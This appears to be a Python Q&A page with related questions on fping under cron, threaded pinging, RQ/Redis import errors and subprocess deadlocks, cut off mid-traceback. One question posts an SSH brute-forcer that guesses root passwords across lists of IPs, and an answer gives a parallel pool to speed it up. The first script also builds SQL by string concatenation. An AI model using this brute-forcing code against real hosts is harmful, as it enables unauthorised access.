Python, fping, cron

I recently wrote a program in Python (my first stab at the language) that grabs IP addresses from a database, pings them using fping, and writes the response times back into the same database. The app works great from the command line, but breaks when run from crontab.
Any help would be greatly appreciated. Thanks
PYTHON CODE -- I got most of this from the interwebs
#!/usr/bin/env python
import MySQLdb as mdb
import threading
import shlex
from subprocess import Popen, PIPE, STDOUT
import subprocess

con = mdb.connect('localhost', '*****', '*****', '*****')

class myThread(threading.Thread):
    def __init__(self, ip_list):
        threading.Thread.__init__(self)
        self.ip_list = ip_list

    def run(self):
        get_ping(self.ip_list)

def get_simple_cmd_output(cmd):
    args = shlex.split(cmd)
    return Popen(args, stdout=PIPE, stderr=subprocess.STDOUT, shell=False).communicate()[0]

def get_ping(ip_list):
    ip_response_dict = {}
    cmd = "fping -C 4 -q {host}".format(host=" ".join(ip_list))
    for x in get_simple_cmd_output(cmd).strip().split(' : ', 0):
        lines = x.split("\n")
        for line in lines:
            if line.upper().find(":", 0) > 0:
                ip_data = line.split(":")
                ip_address = ip_data[0].strip()
                ip_response = ip_data[1].strip().split(" ")
                total = 0
                length = 0
                for ping_time in ip_response:
                    if ping_time != '' and ping_time != '-':
                        total += float(ping_time)
                        length += 1
                if total > 0 and length > 0:
                    ip_response_dict[ip_address] = (total / length)
                else:
                    ip_response_dict[ip_address] = 0
    save_ping_times(ip_response_dict)

def save_ping_times(ip_list):
    cursor = con.cursor()
    for key, value in ip_list.items():
        cursor.execute('INSERT INTO `Tech_AP_Ping_Time`(`IP_Address`,`Value`) VALUES ("' + key + '","' + str(round(value, 2)) + '")')
    con.commit()

threads = []
chunk_length = 100
with con:
    cur = con.cursor(mdb.cursors.DictCursor)
    cur.execute("SELECT `IP_Address` FROM `Tech_APs` WHERE (`IP_Address` IS NOT NULL AND `IP_Address` != '') ORDER BY `IP_Address`")
    rows = cur.fetchall()
    i = 0
    ip_list = []
    for row in rows:
        ip_list.append(row['IP_Address'])
    ip_list = [ip_list[i : i + chunk_length] for i in range(0, len(ip_list), chunk_length)]
    for ip_chunk in ip_list:
        thread = myThread(ip_chunk)
        thread.start()
        threads.append(thread)
CRON COMMAND - Yes, I have a full path to the script set in my actual cron
*/5 * * * * /usr/bin/python distro_pinger.py
ERROR -- I get this when the script runs from cron:
Exception in thread Thread-1:
Traceback (most recent call last):
  File "/usr/lib64/python2.6/threading.py", line 532, in __bootstrap_inner
    self.run()
  File "/var/www/html/poller/distro_pinger.py", line 15, in run
    get_ping(self.ip_list)
  File "/var/www/html/poller/distro_pinger.py", line 25, in get_ping
    for x in get_simple_cmd_output(cmd).strip().split(' : ', 0) :
  File "/var/www/html/poller/distro_pinger.py", line 19, in get_simple_cmd_output
    return Popen(['fping','-C','4','-q','','127.0.0.1'], stdout=PIPE, stderr=subprocess.STDOUT, shell=False).communicate()[0]
  File "/usr/lib64/python2.6/subprocess.py", line 639, in __init__
    errread, errwrite)
  File "/usr/lib64/python2.6/subprocess.py", line 1228, in _execute_child
    raise child_exception
OSError: [Errno 2] No such file or directory
Any help at all would be greatly appreciated. (Even if it's you telling me that I did everything wrong :P)

Try adding the full path to fping in your script. That should do the trick.
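For example (a minimal sketch; /usr/sbin/fping is an assumption, so check the real location with which fping first):

# Use an absolute path so the command resolves under cron's minimal PATH.
# NOTE: /usr/sbin/fping is a guess -- verify the path with `which fping`.
cmd = "/usr/sbin/fping -C 4 -q {host}".format(host=" ".join(ip_list))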

Which user is fping installed for? Is the crontab entry for that same user? If not, does the user the crontab runs under have permission to execute fping?
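Alternatively, you can leave the script alone and give cron a usable PATH (a sketch; adjust the directories to wherever fping actually lives on your system):

PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
*/5 * * * * /usr/bin/python /var/www/html/poller/distro_pinger.py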

Related

Python error when running n inputs at the same time using threads

I am new to Python. I fetch multiple IP addresses from a YAML file and assign them to hosts. Using a for loop, I iterate over these IPs and they are processed one by one, with the result written to a txt file. I want the inputs from the for loop to be processed at the same time, still writing the results to the txt file. I tried using threads, but I get errors when writing to the file.
Here is my code:
import yaml
import requests
from itertools import cycle
import os
import http.client
import time
import sys
import signal
import ipaddress
from pathlib import Path
import socket
from datetime import datetime, timedelta
import subprocess
from threading import Thread, Lock
import threading
import random
from _thread import start_new_thread

class heart_beat():
    # Function for writing ipv4 to a txt
    def ip4write(self, ip, name):
        timestamp = datetime.now().strftime("%B %d %Y, %H:%M:%S")
        print(ip)  # check
        global ip4a
        ip4a = ip
        print("ip", ip)
        self.ipve4(ip, name)
        hbwrite.write(self, ip, name)

    # Function for IPv4
    def ipve4(self, ip, name):
        try:
            global stp
            cmd = "ping -c {} -W {} {}".format(count, wait_sec, ip4a).split(' ')
            output = subprocess.check_output(cmd).decode().strip()
            lines = output.split("\n")
            global roundtime_ms, packet_transmit, u
            roundtime = lines[1].split()[-2].split('=')[1]
            roundtime_ms = float(roundtime) * 1000
            packet_transmit = lines[-2].split(',')[0].split()[0]
            total = lines[-2].split(',')[3].split()[1]
            loss = lines[-2].split(',')[2].split()[0]
            timing = lines[-1].split()[3].split('/')
            status, result = subprocess.getstatusoutput("ping -c1 -w2 " + str(ip4a))
            if status == 0:
                print(str(ip4a) + " UP")
                u = " UP"
                stp = 1
        except Exception as e:
            print(e)

    def fields(self):
        for item in data2:
            if item["type"] == "icmp":
                # make all variables global
                global hosts, ipv4, ipv6, count, wait_sec, schedule, enabled
                hosts = (item["host"])
                ty_name = (item["name"])
                ipv4 = (item["ipv4"])
                ipv6 = (item["ipv6"])
                timeout1 = (item["timeout"])
                timeoutt = int(timeout1.replace("s", ""))
                print(timeoutt)
                fields = (item["fields"])
                l1 = []
                for key in fields:
                    lis = 'fields.' + key + ':' + fields[key]
                    print(lis)
                    l1.append(lis)
                fieldcustom = ""
                for i in l1:
                    fieldcustom = fieldcustom + i + "\t\t"
                print(fieldcustom)
                enabled = (item["enabled"])
                count = 1
                wait_sec = 1

    # Beat function
    def beat(self):
        # Name for the log file
        global lock
        name = 'icmp.log'
        try:
            if(enabled == True):
                for ip in hosts:
                    if(ipv4 == True and ipv6 == False):
                        iv = ipaddress.ip_address(ip)
                        print("iv", iv.version)
                        if (iv.version == 4):
                            start_new_thread(self.ip4write, (ip, name))
        except requests.ConnectionError:
            print("Error")

class hbwrite():
    def write(self, ip, name):
        if(stp == 1):
            # time.sleep(input)
            text_file = open(name, "a+")
            text_file.write("monitor.ip: " "%s" % str(ip) + "\t\t" + "monitor.status: "" %s" % u + "\t\t" + "monitor.id: icmp#icmp-ip#"" %s" % str(ip) + "\t\t" + "icmp.requests:"" %s" % packet_transmit + "\t\t" + "icmp.rtt.us:"" %s" % int(roundtime_ms) + "\t\t" + "beat.name:"" %s" % hostname + "\t\t" + "beat.hostname:"" %s" % hostname + "\t\t" + "beat.version:"" %s" % beatversion + "\t\t" + "tags:"" %s" % tags + "\t\t" + " %s" % fieldcustom)
            text_file.write("\n")
            text_file.close()

if __name__ == '__main__':
    # Load the YAML file in to data
    data = yaml.safe_load(open('beat.yml'))
    data2 = data.get('heartbeat.monitors')
    hb = heart_beat()
    # For setting variables with values
    hb.fields()
    hb.beat()
Code in YAML file:
heartbeat.monitors:
- type: icmp
  name: icmp
  host: ["192.168.1.9","192.168.1.36"]
  enabled: True
  #schedule: "* * * * * */5"
  schedule: "*/1 * 4 2 *"
  #schedule: "*/2 17 29 1 * *"
  ipv4: True
  ipv6: False
  #mode:
  timeout: 20s
  tags: ["res1","ip1"]
  fields:
    a: apple
    b: green
The error I got:
Fatal Python error: could not acquire lock for <_io.BufferedWriter name='<stdout>'> at interpreter shutdown, possibly due to daemon threads

Thread 0x00007f9fd5ed3700 (most recent call first):
  File "stackover.py", line 27 in ip4write

Thread 0x00007f9fd66d4700 (most recent call first):
  File "stackover.py", line 30 in ip4write

Thread 0x00007f9fd6ed5700 (most recent call first):
  File "/usr/lib/python3.5/subprocess.py", line 1397 in _get_handles
  File "/usr/lib/python3.5/subprocess.py", line 911 in __init__
  File "/usr/lib/python3.5/subprocess.py", line 693 in run
  File "/usr/lib/python3.5/subprocess.py", line 626 in check_output
  File "stackover.py", line 40 in ipve4
  File "stackover.py", line 32 in ip4write

Current thread 0x00007f9fdab47700 (most recent call first):
Aborted (core dumped)
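Note: the error message itself points at the cause. Threads created with _thread.start_new_thread behave like daemon threads: the interpreter does not wait for them, so it can shut down while they are still writing. A minimal sketch of the usual remedy, with names borrowed from the code above (hb, hosts, name are placeholders, not a drop-in patch), is to keep explicit Thread handles and join them before exiting:

import threading

threads = []
for ip in hosts:
    t = threading.Thread(target=hb.ip4write, args=(ip, name))
    t.start()
    threads.append(t)
for t in threads:
    t.join()  # keep the interpreter alive until every worker finishes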

ImportError on RQ Worker/Redis/Flask

I am having issues with this setup. In summary, once the user presses submit on a form, the data is passed to an RQ worker via Redis for processing.
The error from rqworker is
23:56:44 RQ worker u'rq:worker:HAFun.12371' started, version 0.5.6
23:56:44
23:56:44 *** Listening on default...
23:56:57 default: min_content.process_feed.process_checks(u'http://www.feedurl.com/url.xml', u'PM', u'alphanumeric', u'domain@domain.com') (9e736730-e97f-4ee5-b48d-448d5493dd6c)
23:56:57 ImportError: No module named min_content.process_feed
Traceback (most recent call last):
  File "/var/www/min_content/min_content/venv/local/lib/python2.7/site-packages/rq/worker.py", line 568, in perform_job
    rv = job.perform()
  File "/var/www/min_content/min_content/venv/local/lib/python2.7/site-packages/rq/job.py", line 495, in perform
    self._result = self.func(*self.args, **self.kwargs)
  File "/var/www/min_content/min_content/venv/local/lib/python2.7/site-packages/rq/job.py", line 206, in func
    return import_attribute(self.func_name)
  File "/var/www/min_content/min_content/venv/local/lib/python2.7/site-packages/rq/utils.py", line 150, in import_attribute
    module = importlib.import_module(module_name)
  File "/usr/lib/python2.7/importlib/__init__.py", line 37, in import_module
    __import__(name)
ImportError: No module named min_content.process_feed
23:56:57 Moving job to u'failed' queue
I have tried starting rqworker in a variety of ways
rqworker --url redis://localhost:6379
rqworker
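Note that the worker resolves min_content.process_feed by importing it, so rqworker has to be started somewhere that package is importable. A sketch of what that usually looks like (paths assumed from the traceback above):

cd /var/www/min_content
PYTHONPATH=. rqworker --url redis://localhost:6379

A worker started from another directory (or before the package was importable) will keep raising this ImportError until it is restarted from the right place.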
views.py
from min_content import app
from flask import render_template
from .forms import SubmissionForm
from flask import request
from .process_feed import process_checks  # this is the function that does the checks
import redis  # needed: process() below refers to redis.StrictRedis
from redis import Redis
from rq import Queue

def process():
    feedUrl = request.form['feedUrl']
    source = request.form['pmsc']
    ourAssignedId = request.form['assignedId']
    email_address = request.form['email_address']
    conn = redis.StrictRedis('localhost', 6379, 0)
    q = Queue(connection=conn)
    result = q.enqueue(process_checks, feedUrl, source, ourAssignedId, email_address)
    return 'It\'s running and we\'ll send you an email when its done<br /><br />Do another one'
process_feed has a function called process_checks, which works as expected.
I know this is working because calling the function directly, with the line below instead of RQ, works fine.
do_it = process_checks(feedUrl,source,ourAssignedId)
The strange thing is that this all worked perfectly well before I closed my SSH connection to the VPS.
Running ps -aux returns this, which indicates Redis is running:
root 11894 0.1 0.4 38096 2348 ? Ssl Oct25 0:01 /usr/local/bin/redis-server *:6379
Restarting redis does nothing, nor does restarting apache2
sudo service redis_6379 start
sudo service redis_6379 stop
sudo service apache2 restart
I followed this guide exactly and, like I said, this worked until I terminated the SSH connection to my VPS.
I'm running in a virtual environment, if that makes any difference; I activate it within my WSGI file:
min_content.wsgi
#!/usr/bin/python
activate_this = '/var/www/min_content/min_content/venv/bin/activate_this.py'
execfile(activate_this, dict(__file__=activate_this))

import sys
import logging
logging.basicConfig(stream=sys.stderr)
sys.path.insert(0, "/var/www/min_content")

from min_content import app as application
application.secret_key = 'blah blah blah'
I have confirmed that the Redis server is running by adding this to the script
r = redis.StrictRedis('localhost', 6379, 0)
r.set(name='teststring', value='this is a test')
test_string = r.get(name='teststring')
print test_string
Running redis-cli returns 127.0.0.1:6379>
process_feed.py
import requests
import xml.etree.ElementTree as ET
import csv
def process_checks(feedUrl, source, ourAssignedId):
    feed_url = feedUrl
    source = source
    ourAssignedId = ourAssignedId
    all_the_data = []
    # grab xml from URL
    try:
        r = requests.get(feed_url)
    except Exception as e:
        print "Failed to grab from " + feed_url
        return "Failed to grab from " + feed_url
    root = ET.fromstring(r.text)
    for advertiser in root.iter('advertiser'):
        assignedId = advertiser.find('assignedId').text
        if assignedId == ourAssignedId:
            # only process for PMs using our assignedId
            for listings in advertiser.iter('listingContentIndexEntry'):
                listingUrl = listings.find('listingUrl').text
                print "Processing " + listingUrl
                # now grab from URL
                listing_request = requests.get(listingUrl)
                # parse XML from URL
                #listing_root = ET.xpath(listing_request.text)
                if not ET.fromstring(listing_request.text.encode('utf8')):
                    print "Failed to load XML for" + listingUrl
                    continue
                else:
                    listing_root = ET.fromstring(listing_request.text.encode('utf8'))
                # 'Stayz Property ID','External Reference','User Account External Reference','Provider','Address Line1','Active','Headline','Listing URL'
                stayzPropertyId = ''  # the property manager enters this into the spreadsheet
                if not listing_root.find('.//externalId').text:
                    print 'No external Id in ' + listingUrl
                    listingExternalId = 'None'
                else:
                    listingExternalId = listing_root.find('externalId').text
                    listingExternalId = '"' + listingExternalId + '"'
                userAccountExternalReference = assignedId
                print userAccountExternalReference
                provider = source
                addressLine1 = listing_root.find('.//addressLine1').text
                active = listing_root.find('active').text
                if not listing_root.find('.//headline/texts/text/textValue').text:
                    print 'No headline in ' + listingExternalId
                    headline = 'None'
                else:
                    headline = listing_root.find('.//headline/texts/text/textValue').text
                    headline = headline.encode('utf-8')
                if not listing_root.find('.//description/texts/text/textValue').text:
                    print 'No description in ' + listingExternalId
                    description = 'None'
                else:
                    description = listing_root.find('.//description/texts/text/textValue').text
                # now check the min content
                # headline length
                headline_length = len(headline)
                headline_length_check = 'FAIL'
                if headline_length < 20:
                    headline_length_check = 'FAIL'
                else:
                    headline_length_check = 'TRUE'
                # description length
                description_length_check = 'FAIL'
                description_length = len(description)
                if description_length < 400:
                    description_length_check = 'FAIL'
                else:
                    description_length_check = 'TRUE'
                # number of images
                num_images = 0
                num_images_check = 'FAIL'
                for images in listing_root.iter('image'):
                    num_images = num_images + 1
                if num_images < 6:
                    num_images_check = 'FAIL'
                else:
                    num_images_check = 'TRUE'
                # at least one rate
                num_rates = 0
                num_rates_check = 'FAIL'
                for rates in listing_root.iter('rate'):
                    num_rates = num_rates + 1
                if num_rates < 1:
                    num_rates_check = 'FAIL'
                else:
                    num_rates_check = 'TRUE'
                # at least one bedroom
                # at least one bathroom
                # a longitude and latitude
                # now add to our list of lists
                data = {'stayzPropertyId':'','listingExternalId':listingExternalId,'userAccountExternalReference':userAccountExternalReference,'provider':provider,'addressLine1':addressLine1,'active':active,'headline':headline,'listingUrl':listingUrl,'Headline > 20 characters?':headline_length_check,'Description > 400 characters?':description_length_check,'Number of Images > 6?':num_images_check,'At least one rate?':num_rates_check}
                #data_dict = ['',listingExternalId,userAccountExternalReference,provider,addressLine1,active,headline,listingUrl]
                all_the_data.append(data)
    files_location = './files/' + source + '__' + ourAssignedId + '_export.csv'
    with open(files_location, 'w') as csvFile:
        #with open('./files/' + source + '_export.csv','a') as csvFile:
        fieldnames = ['stayzPropertyId','listingExternalId','userAccountExternalReference','provider','addressLine1','active','headline','listingUrl','Headline > 20 characters?','Description > 400 characters?','Number of Images > 6?','At least one rate?']
        writer = csv.DictWriter(csvFile, fieldnames=fieldnames)
        writer.writeheader()
        for row in all_the_data:
            try:
                writer.writerow(row)
            except:
                print "Failed to write row " + str(row)
                continue
    # send email via Mailgun
    return requests.post(
        "https://api.mailgun.net/v3/sandboxablahblablbah1.mailgun.org/messages",
        auth=("api", "key-blahblahblah"),
        #files=("attachment", open(files_location)),
        data={"from": "Mailgun Sandbox <postmaster@.mailgun.org>",
              "to": "Me <me@me.com>",
              "subject": "Feed Processed for " + ourAssignedId,
              "text": "Done",
              "html": "<b>Process the file</b>"})

Multithreading my simple SSH Brute forcer

I've coded a simple SSH brute-forcer, and I am trying to make it multi-threaded because it runs very slowly at the moment. As you can see in the last few lines, I have given it an attempt, but I don't fully understand threading. I have read a few examples but still don't quite get it, so I felt that adding it to my program would help me understand it better.
Code:
try:
    import paramiko
except ImportError:
    print("Paramiko module not installed, exiting.")

from multiprocessing.dummy import Pool, Process, JoinableQueue as Queue
import os
from datetime import datetime

startTime = datetime.now()
UserName2 = 'root'
pass_file = 'pass.txt'
ip_file = 'ip.txt'
port = 22
Found = 0
IPLines = 0
PasswordLines = 0
with open('pass.txt') as txt1:
    for line in txt1:
        if line.strip():
            PasswordLines += 1
with open('ip.txt') as txt2:
    for line2 in txt2:
        if line2.strip():
            IPLines += 1
current_attempts = 0
max_attempts = PasswordLines * IPLines

def print_results(found):
    while True:
        ip, password = found.get()
        print("Found: %r %r" % (ip, password))
        found.task_done()

def init(found_):
    global found
    found = found_

def generate_passwords():
    #return (line.strip() for line in open(pass_file))
    global ip
    global pwd
    global txt4
    txt3 = open(pass_file, "r")
    txt4 = open(ip_file, "r")
    for line3 in txt3.readlines():
        pwd = line3.strip()
    for line4 in txt4.readlines():
        ip = line4.strip()

def check(ip_password):
    global current_attempts
    ip, password = ip_password
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        ssh.connect(ip, port, username=UserName2, password=pwd)
    except paramiko.AuthenticationException, e:
        print e
        print '[-] %s:%s fail!' % (UserName2, pwd)
        current_attempts += 1
    except Exception, e:
        print e
    else:
        print '[!] %s:%s is CORRECT for IP %s!' % (UserName2, pwd, ip)
        username, password, ipaddress = UserName2, pwd, ip
        found.put((username, password, ipaddress))
        seconds_taken = datetime.now() - startTime
        print 'brute forcing took %s seconds' % seconds_taken
        ssh.close()
        print 'Found login in %s attempts' % current_attempts
        if os.path.isfile("correct.txt"):
            c = open("correct.txt", "a")
            c.write('\n' + ip + ':' + UserName2 + ':' + pwd)
        elif os.path.isfile("correct.txt"):
            c = open('correct.txt', "w")
            c.write(ip + ':' + UserName2 + ':' + pwd)

def main():
    found = Queue()
    t = Process(target=check, args=[found])
    t.daemon = True  # do not survive the parent
    t.start()
    pool = Pool(processes=20, initializer=init, initargs=[found])
    args = ((ip, password) for password in generate_passwords() for ip in txt4)
    for _ in pool.imap_unordered(check, args):
        pass
    pool.close()  # no more tasks
    pool.join()   # wait for all tasks in the pool to complete
    found.join()  # wait until all results are printed

if __name__ == "__main__":
    main()
Errors:
Exception in thread Thread-1:
Traceback (most recent call last):
File "C:\Python27\lib\threading.py", line 810, in __bootstrap_inner
self.run()
File "C:\Python27\lib\threading.py", line 763, in run
self.__target(*self.__args, **self.__kwargs)
File "C:\Python33\Stuff I made\SSH_Bruter4.py", line 65, in check
ip, password = ip_password
TypeError: iteration over non-sequence
Traceback (most recent call last):
File "C:\Python33\Stuff I made\SSH_Bruter4.py", line 107, in <module>
main()
File "C:\Python33\Stuff I made\SSH_Bruter4.py", line 99, in main
args = ((ip, password) for password in generate_passwords() for ip in txt4)
TypeError: 'NoneType' object is not iterable
The problem is embarrassingly parallel: you can run the ssh connection attempts concurrently, both for different ips and for different passwords:
#!/usr/bin/env python
# remove .dummy to use processes instead of threads
from multiprocessing.dummy import Pool

def check(params):
    ip, username, password = params
    # emulate ssh login attempt #XXX put your ssh connect code here
    import random
    successful = random.random() < .0001
    return successful, params

def main():
    creds = {}
    ips = ["168.1.2.%d" % i for i in range(256)]  #XXX dummy ip list, use yours
    usernames = ["nobody", "root"]  #XXX dummy user list, use yours

    def generate_args():
        for ip in ips:
            for username in usernames:
                for password in generate_passwords():
                    if (ip, username) in creds:
                        break
                    yield ip, username, password

    pool = Pool(processes=20)
    for success, params in pool.imap_unordered(check, generate_args()):
        if not success:
            continue
        print("Found: %r" % (params,))
        ip, username, password = params
        creds[ip, username] = password
    pool.close()  # no more tasks
    pool.join()   # wait for all tasks in the pool to complete

if __name__ == "__main__":
    main()
where ips is a list of all the ips you want to try, and generate_passwords() is a generator that yields one password at a time. Here's an example:

def generate_passwords(pass_file):
    return (line.strip() for line in open(pass_file))
About errors
ValueError: too many values to unpack

Your code calls found.put((username, password, ipaddress)) (a tuple with 3 values), but the print_results() function expects ip, password = found.get() (2 values). The error "too many values to unpack" is raised because 3 is more than 2.
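A sketch of the fix is simply to make both ends of the queue agree on the tuple size:

found.put((username, password, ipaddress))   # producer sends 3 values
username, password, ipaddress = found.get()  # consumer must unpack the same 3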
'NoneType' object is not iterable

Your generate_passwords() function returns nothing (None), but it is used where something iterable that yields passwords is required (see the example implementation above).

Python-Subprocess-Popen Deadlock in a multi-threaded environment

I have the following piece of code running inside a thread, where the 'expand' C executable produces a unique string output for each input 'url':
p = Popen(["expand", url], bufsize=65536, stdout=PIPE, stderr=PIPE, close_fds=True)
output,error = p.communicate()
print output
I have implemented a Queue-based multithreading solution which processes 5000 urls in batches of 100 each.
When I run the script it hangs, and ps -aef shows that 2 processes are still running:
1. 10177 5721 6662 6 09:25 pts/15 00:04:36 python expandPlaylist.py -s -t
2. 10177 11004 5721 0 09:26 pts/15 00:00:00 expand http://www.sample.com
Stack trace for main python script:
# ThreadID: 140332211570432
File: "expandPlaylist.py", line 902, in <module>
Main()
File: "expandPlaylist.py", line 894, in Main
startmain(db, c, conf)
File: "expandPlaylist.py", line 834, in startmain
stream_queue.join()
File: "/usr/lib64/python2.7/Queue.py", line 82, in join
self.all_tasks_done.wait()
File: "/usr/lib64/python2.7/threading.py", line 238, in wait
waiter.acquire()
Stack trace for Thread which got deadlocked
# ThreadID: 140332016596736
File: "/usr/lib64/python2.7/threading.py", line 503, in __bootstrap
self.__bootstrap_inner()
File: "/usr/lib64/python2.7/threading.py", line 530, in __bootstrap_inner
self.run()
File: "expandPlaylist.py", line 120, in run
self.process.wait()
File: "/usr/lib64/python2.7/subprocess.py", line 1242, in wait
pid, sts = _eintr_retry_call(os.waitpid, self.pid, 0)
File: "/usr/lib64/python2.7/subprocess.py", line 471, in _eintr_retry_call
return func(*args)
GDB details for process_id: 11004
(gdb) bt
#0 __lll_lock_wait () at ../nptl/sysdeps/unix/sysv/linux/x86_64/lowlevellock.S:136
#1 0x00007fc36bd33294 in _L_lock_999 () from /lib64/libpthread.so.0
#2 0x00007fc36bd330aa in __pthread_mutex_lock (mutex=0x6a8c20) at pthread_mutex_lock.c:61
#3 0x00007fc36c204dcd in g_mutex_lock (mutex=0x6a8c50) at gthread-posix.c:213
#4 0x00007fc36c1b11df in g_source_unref_internal (source=0x844f90, context=0x6a8c50, have_lock=0) at gmain.c:1975
#5 0x00007fc36c1b13e3 in g_source_unref (source=0x844f90) at gmain.c:2044
#6 0x00007fc36cb475a9 in soup_session_dispose (object=0x61e100) at soup-session.c:305
#7 0x00007fc36c4d270e in g_object_unref (_object=0x61e100) at gobject.c:3160
#8 0x000000000040584b in dispose_session (parser=0x618020) at al_playlist_parser.c:859
#9 0x0000000000403b0b in al_playlist_parser_dispose (obj=0x618020) at al_playlist_parser.c:129
#10 0x00007fc36c4d270e in g_object_unref (_object=0x618020) at gobject.c:3160
#11 0x0000000000403315 in main (argc=1, argv=0x7fff462cdca8) at al_expand.c:143
How can I avoid the deadlock?
Alternatively, is there a way to bind a timeout to self.process.wait() and terminate that thread if the subprocess takes too long to process?
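Note that the deadlocked thread above is sitting in self.process.wait(), and the subprocess docs warn that Popen.wait() can deadlock when stdout=PIPE (or stderr=PIPE) is used and the child fills the OS pipe buffer. Draining the pipes with communicate() instead, as the first snippet already does, avoids that. A minimal sketch (url assumed to be supplied by the caller):

from subprocess import Popen, PIPE

p = Popen(["expand", url], stdout=PIPE, stderr=PIPE, close_fds=True)
output, error = p.communicate()  # drains both pipes, then reaps the child
status = p.returncode            # no separate p.wait() needed afterwards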
If you only have to call a subprocess on a list of arguments, I tend to do something like this:
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Author: R.F. Smith <rsmith@xs4all.nl>
# $Date: 2013-11-24 11:06:39 +0100 $
#
# To the extent possible under law, Roland Smith has waived all copyright and
# related or neighboring rights to vid2mp4.py. This work is published from the
# Netherlands. See http://creativecommons.org/publicdomain/zero/1.0/

"""Convert all video files given on the command line to H.264/AAC streams in
an MP4 container."""

from __future__ import print_function, division  # for compatibility with Python 2.

__version__ = '$Revision: cac4808 $'[11:-2]

import os
import sys
import subprocess
from multiprocessing import cpu_count
from time import sleep

def warn(s):
    """Print a warning message.

    :param s: Message string
    """
    s = ' '.join(['Warning:', s])
    print(s, file=sys.stderr)

def checkfor(args, rv=0):
    """Make sure that a program necessary for using this script is
    available.

    :param args: String or list of strings of commands. A single string may
        not contain spaces.
    :param rv: Expected return value from evoking the command.
    """
    if isinstance(args, str):
        if ' ' in args:
            raise ValueError('no spaces in single command allowed')
        args = [args]
    try:
        with open(os.devnull, 'w') as bb:
            rc = subprocess.call(args, stdout=bb, stderr=bb)
        if rc != rv:
            raise OSError
    except OSError as oops:
        outs = "Required program '{}' not found: {}."
        print(outs.format(args[0], oops.strerror))
        sys.exit(1)

def startencoder(fname):
    """Use ffmpeg to convert a video file to H.264/AAC
    streams in an MP4 container.

    :param fname: Name of the file to convert.
    :returns: a 3-tuple of a Process, input path and output path
    """
    basename, ext = os.path.splitext(fname)
    known = ['.mp4', '.avi', '.wmv', '.flv', '.mpg', '.mpeg', '.mov', '.ogv']
    if ext.lower() not in known:
        warn("File {} has unknown extension, ignoring it.".format(fname))
        return (None, fname, None)
    ofn = basename + '.mp4'
    args = ['ffmpeg', '-i', fname, '-c:v', 'libx264', '-crf', '29', '-flags',
            '+aic+mv4', '-c:a', 'libfaac', '-sn', ofn]
    with open(os.devnull, 'w') as bitbucket:
        try:
            p = subprocess.Popen(args, stdout=bitbucket, stderr=bitbucket)
            print("Conversion of {} to {} started.".format(fname, ofn))
        except:
            warn("Starting conversion of {} failed.".format(fname))
    return (p, fname, ofn)

def manageprocs(proclist):
    """Check a list of subprocesses tuples for processes that have ended and
    remove them from the list.

    :param proclist: a list of (process, input filename, output filename)
        tuples.
    """
    print('# of conversions running: {}\r'.format(len(proclist)), end='')
    sys.stdout.flush()
    for p in proclist:
        pr, ifn, ofn = p
        if pr is None:
            proclist.remove(p)
        elif pr.poll() is not None:
            print('Conversion of {} to {} finished.'.format(ifn, ofn))
            proclist.remove(p)
    sleep(0.5)

def main(argv):
    """Main program.

    :param argv: command line arguments
    """
    if len(argv) == 1:
        binary = os.path.basename(argv[0])
        print("{} version {}".format(binary, __version__), file=sys.stderr)
        print("Usage: {} [file ...]".format(binary), file=sys.stderr)
        sys.exit(0)
    checkfor(['ffmpeg', '-version'])
    avis = argv[1:]
    procs = []
    maxprocs = cpu_count()
    for ifile in avis:
        while len(procs) == maxprocs:
            manageprocs(procs)
        procs.append(startencoder(ifile))
    while len(procs) > 0:
        manageprocs(procs)

if __name__ == '__main__':
    main(sys.argv)
If hanging processes are an issue, you could adapt manageprocs to kill a subprocess after a certain amount of time.
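A minimal sketch of that adaptation (the 600-second limit and the extra start-time field are assumptions, not part of the original script): have startencoder() return (process, fname, ofn, time()) 4-tuples, then kill anything that runs past the limit:

from time import time

MAXSECONDS = 600  # assumed limit; tune it for your workload

def manageprocs(proclist):
    # iterate over a copy so removing entries is safe
    for p in proclist[:]:
        pr, ifn, ofn, started = p
        if pr is None:
            proclist.remove(p)
        elif pr.poll() is not None:
            print('Conversion of {} to {} finished.'.format(ifn, ofn))
            proclist.remove(p)
        elif time() - started > MAXSECONDS:
            pr.kill()  # force-terminate the hung converter
            warn('Conversion of {} killed after {} seconds.'.format(ifn, MAXSECONDS))
            proclist.remove(p)
    sleep(0.5)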

Convert Ghostscript from os.popen to subprocess.Popen in Python

I need to create a monkey patch for Ghostscript: I have to migrate from os.popen to subprocess.Popen because I can't use the shell on my system.
I tried it this way:
def mioGhostscript(tile, size, fp):
    """Render an image using Ghostscript (Unix only)"""
    # Unpack decoder tile
    decoder, tile, offset, data = tile[0]
    length, bbox = data
    import tempfile, os
    file = tempfile.mktemp()
    # Build ghostscript command
    command = ["gs",
               "-q",                      # quiet mode
               "-g%dx%d" % size,          # set output geometry (pixels)
               "-dNOPAUSE -dSAFER",       # don't pause between pages, safe mode
               "-sDEVICE=ppmraw",         # ppm driver
               "-sOutputFile=%s" % file,  # output file
               "- >/dev/null 2>/dev/null"
               ]
    #command = shlex.split(string.join(command))
    # push data through ghostscript
    try:
        #gs = os.popen(command, "w")
        args = command  #['gs','-dSAFER','-dNOPAUSE','-dBATCH','-sDEVICE=jpeg','-sOutputFile=/home/user/output2.jpg /home/user/downloads/test.pdf']
        gs = subprocess.Popen(args, stdout=PIPE, stderr=STDOUT, stdin=PIPE)
        # adjust for image origin
        if bbox[0] != 0 or bbox[1] != 0:
            #gs.write("%d %d translate\n" % (-bbox[0], -bbox[1]))
            gs.stdin.write("%d %d translate\n" % (-bbox[0], -bbox[1]))
        fp.seek(offset)
        while length > 0:
            s = fp.read(8192)
            if not s:
                break
            length = length - len(s)
            raise Exception(s)
            gs.stdin.write(s)
        gs.communicate()[0]
        status = gs.stdin.close()
        #status = gs.close()
        #if status:
        #    raise IOError("gs failed (status %d)" % status)
        im = Image.core.open_ppm(file)
    finally:
        try: os.unlink(file)
        except: pass
    return im

import PIL
PIL.EpsImagePlugin.Ghostscript = mioGhostscript
but I get this traceback:
Traceback (most recent call last):
  File "/home/web/lib/driver_mod_python.py", line 252, in handler
    buf = m.__dict__[pard['program']](pard)
  File "/home/dtwebsite/bin/cms_gest_ordini.py", line 44, in wrapped
    return func(pard)
  File "/home/dtwebsite/bin/cms_gest_ordini.py", line 95, in wrapped
    return func(pard)
  File "/home/dtwebsite/bin/cms_gest_picking_list.py", line 341, in picking_list
